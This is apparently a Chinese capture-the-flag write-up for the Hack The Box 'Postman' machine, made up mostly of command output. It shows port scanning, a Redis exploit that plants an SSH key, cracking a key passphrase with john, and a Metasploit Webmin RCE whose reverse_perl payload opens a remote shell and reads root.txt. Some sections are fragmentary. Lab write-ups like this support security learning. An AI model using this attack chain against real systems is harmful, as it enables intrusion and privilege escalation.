kali@kali:~$ nmap -A -Pn -T4 -p- 10.10.10.160 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 23:18 EST Nmap scan report for postman.htb (10.10.10.160) Host is up (0.34s latency). Not shown: 65531 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA) | 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA) |_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: The Cyber Geek's Personal Website 6379/tcp open redis Redis key-value store 4.0.9 10000/tcp open http MiniServ 1.910 (Webmin httpd) |_http-server-header: MiniServ/1.910 |_http-trane-info: Problem with XML parsing of /evox/about Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
主要来看一下80、6379和10000端口。
80端口:
6379端口:
10000端口:
通常80端口没有什么利用的东西,10000端口上运行Webmin服务尝试弱口令没有效果,而redis服务暴露在6379端口,可以从这里下手,Googleredis key store 4.0.9 expolit,找到下面利用方式
except: print"Something went wrong" else: print colored("\tRedis-cli:::::This utility is not present on your system. You need to install it to proceed further.", "red")
SSH Keys Need to be Generated Generating public/private rsa key pair. Enter file inwhich to save the key (/home/kali/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/kali/.ssh/id_rsa. Your public key has been saved in /home/kali/.ssh/id_rsa.pub. The key fingerprint is: SHA256:wMzHMZr3ew4dVP3cXrwsWg7JF7ay4peQHLplhK7BDww acid_creative The key's randomart image is: +---[RSA 3072]----+ | o .. | | + + o . .| | B = . oo| | E = + . o *| | + . S = + +.o| | = o * B * o.| | = + + % . | | . o . O . | | ..o . | +----[SHA256]-----+ Keys Generated Successfully OK OK OK (error) ERR Changing directory: No such file or directory OK OK You'll get shell in sometime..Thanks for your patience Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Feb 10 08:46:56 2020 from 10.10.15.125 redis@Postman:~$ pwd /var/lib/redis
kali@kali:~/Desktop$ /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes Cost 2 (iteration count) is 2 for all loaded hashes Will run 2 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status computer2008 (id_rsa) 1g 0:00:00:35 DONE (2020-02-10 04:28) 0.02844g/s 408014p/s 408014c/s 408014C/sa6_123..*7¡Vamos! Session completed
切换为Matt用户,读取user.txt文件:
1 2 3 4 5
redis@Postman:~$ su Matt Password: Matt@Postman:/var/lib/redis$ cd /home/Matt/ Matt@Postman:~$ cat user.txt 517ad0ec2458ca97af8d93aac08a2f3c
Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD computer2008 yes Webmin Password Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.160 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 10000 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Base path for Webmin application USERNAME Matt yes Webmin Username VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.14.4 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Webmin <= 1.910
msf5 exploit(linux/http/webmin_packageup_rce) > exploit [*] Started reverse TCP handler on 10.10.14.113:4444 [+] Session cookie: ba61f4eadcffcce039b166a29defa004 [*] Attempting to execute the payload... [*] Command shell session 1 opened (10.10.14.113:4444 -> 10.10.10.160:46990) at 2019-12-24 17:43:52 -0500 cat /root/root.txt a257741[-----------------]ddce